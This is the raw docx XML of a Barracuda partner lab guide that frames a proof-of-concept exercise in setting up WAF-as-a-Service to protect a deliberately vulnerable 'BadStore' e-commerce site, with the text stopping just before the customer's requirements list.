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567D8" w:rsidP="30DB4EA1" w:rsidRDefault="7F698058" w14:paraId="4FE99217" w14:textId="7335388E">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="520BA0FC" w:rsidR="7F698058">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008567D8" w:rsidP="520BA0FC" w:rsidRDefault="00C34781" w14:paraId="596BBB9D" w14:textId="1C65860D">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="4B6FA018">
        <w:drawing>
          <wp:inline wp14:editId="1ED0FB86" wp14:anchorId="0FC05AB0">
            <wp:extent cx="5505452" cy="1200150"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1869596615" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="Rb40b2c812088463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05452" cy="1200150"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6A8F" w:rsidP="16AED19E" w:rsidRDefault="004B6A8F" w14:paraId="7BAAE2AB" w14:textId="0E29964A">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="16AED19E" w:rsidR="4B9F8C15">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Partner </w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="004B6A8F">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Lab Guide</w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="238F01D1">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="0985D340">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="0EED8303">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="0B8481DA">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Setup, Config and Troubleshooting</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="16AED19E" w:rsidP="16AED19E" w:rsidRDefault="16AED19E" w14:paraId="1FE528F8" w14:textId="6D9BB0A1">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="16AED19E" w:rsidP="16AED19E" w:rsidRDefault="16AED19E" w14:paraId="41381EE8" w14:textId="57BDA96E">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="16AED19E" w:rsidP="16AED19E" w:rsidRDefault="16AED19E" w14:paraId="4863D988" w14:textId="721CBF9B">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="16AED19E" w:rsidP="16AED19E" w:rsidRDefault="16AED19E" w14:paraId="5FC66F24" w14:textId="67BA7230">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="16AED19E" w:rsidP="16AED19E" w:rsidRDefault="16AED19E" w14:paraId="5628DA78" w14:textId="31C2C427">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="16AED19E" w:rsidP="16AED19E" w:rsidRDefault="16AED19E" w14:paraId="344C5781" w14:textId="5C6E5D31">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="16AED19E" w:rsidP="16AED19E" w:rsidRDefault="16AED19E" w14:paraId="409D59E2" w14:textId="24FFA203">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="16AED19E" w:rsidP="16AED19E" w:rsidRDefault="16AED19E" w14:paraId="1F8AFDCB" w14:textId="03E40766">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="16AED19E" w:rsidP="16AED19E" w:rsidRDefault="16AED19E" w14:paraId="07335017" w14:textId="56E0BC33">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="16AED19E" w:rsidP="16AED19E" w:rsidRDefault="16AED19E" w14:paraId="6F77C4F1" w14:textId="2D156D8D">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="1FC32761" w:rsidP="16AED19E" w:rsidRDefault="1FC32761" w14:paraId="716B4CC3" w14:textId="7B08847B">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="16AED19E" w:rsidR="1FC32761">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2/</w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="55B9EC24">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>18</w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="1FC32761">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/2021 Rev 1.</w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="4732110D">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="16AED19E" w:rsidP="16AED19E" w:rsidRDefault="16AED19E" w14:paraId="3CD3A102" w14:textId="536EB4A8">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="16AED19E" w:rsidP="16AED19E" w:rsidRDefault="16AED19E" w14:paraId="7FB262DB" w14:textId="4CEFE279">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="16AED19E" w:rsidP="16AED19E" w:rsidRDefault="16AED19E" w14:paraId="154B0AE1" w14:textId="410963EF">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="520BA0FC" w:rsidRDefault="520BA0FC" w14:paraId="4693F6E1" w14:textId="719012BA">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6A8F" w:rsidP="520BA0FC" w:rsidRDefault="004B6A8F" w14:paraId="5E2604D4" w14:textId="4DF29F29">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidR="209BE027">
        <w:rPr/>
        <w:t>Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6A8F" w:rsidP="004B6A8F" w:rsidRDefault="004B6A8F" w14:paraId="098FD995" w14:textId="08EE067E">
      <w:r w:rsidR="74A68BFF">
        <w:rPr/>
        <w:t>For</w:t>
      </w:r>
      <w:r w:rsidR="004B6A8F">
        <w:rPr/>
        <w:t xml:space="preserve"> this lab</w:t>
      </w:r>
      <w:r w:rsidR="259EA80C">
        <w:rPr/>
        <w:t xml:space="preserve">, imagine we are doing a POC ( Proof of Concept ) </w:t>
      </w:r>
      <w:r w:rsidR="2A12F542">
        <w:rPr/>
        <w:t xml:space="preserve">of Barracuda WAF-as-a-Service </w:t>
      </w:r>
      <w:r w:rsidR="259EA80C">
        <w:rPr/>
        <w:t xml:space="preserve">for a customer.  </w:t>
      </w:r>
      <w:r w:rsidR="259EA80C">
        <w:rPr/>
        <w:t>Y</w:t>
      </w:r>
      <w:r w:rsidR="004B6A8F">
        <w:rPr/>
        <w:t>ou will learn to:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C34781" w:rsidP="004B6A8F" w:rsidRDefault="00C34781" w14:paraId="48499FE3" w14:textId="1E470065">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="250D3359">
        <w:rPr/>
        <w:t xml:space="preserve">Understand </w:t>
      </w:r>
      <w:r w:rsidR="3CE99C5E">
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidR="250D3359">
        <w:rPr/>
        <w:t xml:space="preserve"> customer’s </w:t>
      </w:r>
      <w:r w:rsidR="363D5795">
        <w:rPr/>
        <w:t xml:space="preserve">security </w:t>
      </w:r>
      <w:r w:rsidR="250D3359">
        <w:rPr/>
        <w:t xml:space="preserve">requirements </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C34781" w:rsidP="004B6A8F" w:rsidRDefault="00C34781" w14:paraId="5AD6ED40" w14:textId="55879763">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="00C34781">
        <w:rPr/>
        <w:t>Set up WAF-as-a-Service to protect a customer’s e-commerce site.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C34781" w:rsidP="004B6A8F" w:rsidRDefault="00C34781" w14:paraId="6FE6AE8E" w14:textId="1304744B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="00C34781">
        <w:rPr/>
        <w:t xml:space="preserve">Troubleshoot and fix false positives – </w:t>
      </w:r>
      <w:r w:rsidR="72AF9082">
        <w:rPr/>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r w:rsidR="00C34781">
        <w:rPr/>
        <w:t>WAF-as-a-Service blocks legitimate access to the site.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002F558A" w:rsidP="00C34781" w:rsidRDefault="00C34781" w14:paraId="7A8EA259" w14:textId="25231C13">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="00C34781">
        <w:rPr/>
        <w:t>Address additional security concerns found by the customer during the PoC.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009839C7" w:rsidP="00072E2A" w:rsidRDefault="00072E2A" w14:paraId="7BDBC4C3" w14:textId="122421F4">
      <w:r w:rsidR="00072E2A">
        <w:rPr/>
        <w:t xml:space="preserve">For each step, there is a description of the customer requirement or situation.  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009839C7" w:rsidP="00072E2A" w:rsidRDefault="00072E2A" w14:paraId="6481F852" w14:textId="1045B415">
      <w:r w:rsidR="00072E2A">
        <w:rPr/>
        <w:t xml:space="preserve">Try to figure out how to configure WAF-as-a-Service to match customer requirements </w:t>
      </w:r>
      <w:r w:rsidR="009839C7">
        <w:rPr/>
        <w:t xml:space="preserve">or fix customer issues </w:t>
      </w:r>
      <w:r w:rsidR="00072E2A">
        <w:rPr/>
        <w:t xml:space="preserve">on your own.  </w:t>
      </w:r>
      <w:r w:rsidR="009839C7">
        <w:rPr/>
        <w:t>The two most useful things you can do are:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009839C7" w:rsidP="009839C7" w:rsidRDefault="009839C7" w14:paraId="217E7A07" w14:textId="0BF6C63C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="009839C7">
        <w:rPr/>
        <w:t>If you’re troubleshooting a false positive, reproduce the issue reported by the customer yourself (so that you get the block page) and then look at the Firewall Logs to see why you were blocked.  The logs will provide all the info you need to fix the problem.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009839C7" w:rsidP="009839C7" w:rsidRDefault="009317F6" w14:paraId="50DBC220" w14:textId="463F21B9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="009317F6">
        <w:rPr/>
        <w:t>If you’re trying to address a security concern, c</w:t>
      </w:r>
      <w:r w:rsidR="009839C7">
        <w:rPr/>
        <w:t>lick “Add Component” in WAF-as-a-Service and browse the component descriptions until you find one that matches what you’re trying to do.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="699639B3" w:rsidRDefault="699639B3" w14:paraId="3AC50E13" w14:textId="3763945A">
      <w:r w:rsidR="00072E2A">
        <w:rPr/>
        <w:t xml:space="preserve">If you need help, expand the </w:t>
      </w:r>
      <w:r w:rsidR="009307BA">
        <w:rPr/>
        <w:t xml:space="preserve">Hint section, if there is one.  Once you have completed the task, expand the </w:t>
      </w:r>
      <w:r w:rsidR="00072E2A">
        <w:rPr/>
        <w:t xml:space="preserve">Instructions section </w:t>
      </w:r>
      <w:r w:rsidR="009307BA">
        <w:rPr/>
        <w:t>to ensure you’ve solved it correctly</w:t>
      </w:r>
      <w:r w:rsidR="00072E2A">
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="009839C7">
        <w:rPr/>
        <w:t xml:space="preserve">  If the customer reported a </w:t>
      </w:r>
      <w:r w:rsidR="009317F6">
        <w:rPr/>
        <w:t>false positive, be sure to try the same procedure again and see that you aren’t blocked this time</w:t>
      </w:r>
      <w:r w:rsidR="21439165">
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="4D97BE07" w:rsidP="16AED19E" w:rsidRDefault="4D97BE07" w14:paraId="5C35ACA9" w14:textId="5B48DF4A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidR="63F7182A">
        <w:rPr/>
        <w:t>Security On by Default</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4D97BE07" w:rsidP="16AED19E" w:rsidRDefault="4D97BE07" w14:paraId="741F33F8" w14:textId="598E9951">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidR="761A5C3B">
        <w:rPr/>
        <w:t>When you create a WAF-as-a-Service application, the following protections are on by default:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4D97BE07" w:rsidP="4CBE4E3E" w:rsidRDefault="4D97BE07" w14:paraId="27F114F4" w14:textId="55371CF1">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:ind/>
      </w:pPr>
      <w:r w:rsidR="63F7182A">
        <w:drawing>
          <wp:inline wp14:editId="5605FDA6" wp14:anchorId="3B606F9B">
            <wp:extent cx="4874561" cy="5800725"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1657804727" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R36edd46393df45a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874561" cy="5800725"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="4D97BE07" w:rsidP="16AED19E" w:rsidRDefault="4D97BE07" w14:paraId="08303A26" w14:textId="55D473F6">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:ind/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="4D97BE07" w:rsidP="16AED19E" w:rsidRDefault="4D97BE07" w14:paraId="7FC3BC75" w14:textId="77EE8247">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidR="4D97BE07">
        <w:rPr/>
        <w:t xml:space="preserve">Customer </w:t>
      </w:r>
      <w:r w:rsidR="2BB3D54B">
        <w:rPr/>
        <w:t xml:space="preserve">High Level </w:t>
      </w:r>
      <w:r w:rsidR="4D97BE07">
        <w:rPr/>
        <w:t>Requirements</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00072E2A" w:rsidP="520BA0FC" w:rsidRDefault="00072E2A" w14:paraId="30721971" w14:textId="1B25FB94">
      <w:pPr>
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="00C34781">
        <w:rPr/>
        <w:t>Your customer has an e-commerce site hosted at</w:t>
      </w:r>
      <w:r w:rsidR="00072E2A">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="R12619753ee6a46a7">
        <w:r w:rsidRPr="520BA0FC" w:rsidR="1CD72C20">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http</w:t>
        </w:r>
        <w:r w:rsidRPr="520BA0FC" w:rsidR="0FE5D3A2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>s</w:t>
        </w:r>
        <w:r w:rsidRPr="520BA0FC" w:rsidR="1CD72C20">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>://badstore.cudathon.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="1CD72C20">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="623E066B">
        <w:rPr/>
        <w:t>that gets hacked a lot</w:t>
      </w:r>
      <w:r w:rsidR="38718DAB">
        <w:rPr/>
        <w:t xml:space="preserve"> even though </w:t>
      </w:r>
      <w:r w:rsidR="1545E04D">
        <w:rPr/>
        <w:t xml:space="preserve">their </w:t>
      </w:r>
      <w:r w:rsidR="38718DAB">
        <w:rPr/>
        <w:t xml:space="preserve">firewall </w:t>
      </w:r>
      <w:r w:rsidR="4733022E">
        <w:rPr/>
        <w:t xml:space="preserve">blocks all traffic except that coming in on </w:t>
      </w:r>
      <w:r w:rsidR="38718DAB">
        <w:rPr/>
        <w:t>port 80.</w:t>
      </w:r>
      <w:r w:rsidR="044FAA06">
        <w:rPr/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00072E2A" w:rsidP="520BA0FC" w:rsidRDefault="00072E2A" w14:paraId="2FA56990" w14:textId="62E8D817">
      <w:pPr>
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="520BA0FC" w:rsidR="3BEB3B6E">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve">BadStore was created back in the mid 1990s. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="520BA0FC" w:rsidR="3BEB3B6E">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>BadStore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="520BA0FC" w:rsidR="3BEB3B6E">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> was set to sell unique items on the internet, but also attract suppliers that could provide further unique items for sale on the web site. The web site was written by the store owner – who knew enough about coding and the internet to get the site functional. However, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="520BA0FC" w:rsidR="3BEB3B6E">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>BadStore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="520BA0FC" w:rsidR="3BEB3B6E">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> has also caught the attention of hackers and attackers – looking for ways to either compromise the site or infiltrate the site and the data behind it. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00072E2A" w:rsidP="00C34781" w:rsidRDefault="00072E2A" w14:paraId="75969087" w14:textId="2C14D097">
      <w:r w:rsidR="4DEC2AA5">
        <w:rPr/>
        <w:t xml:space="preserve">From talking to the customer, their </w:t>
      </w:r>
      <w:r w:rsidR="3A3D90D4">
        <w:rPr/>
        <w:t xml:space="preserve">high level </w:t>
      </w:r>
      <w:r w:rsidR="4DEC2AA5">
        <w:rPr/>
        <w:t>requirements are:</w:t>
      </w:r>
    </w:p>
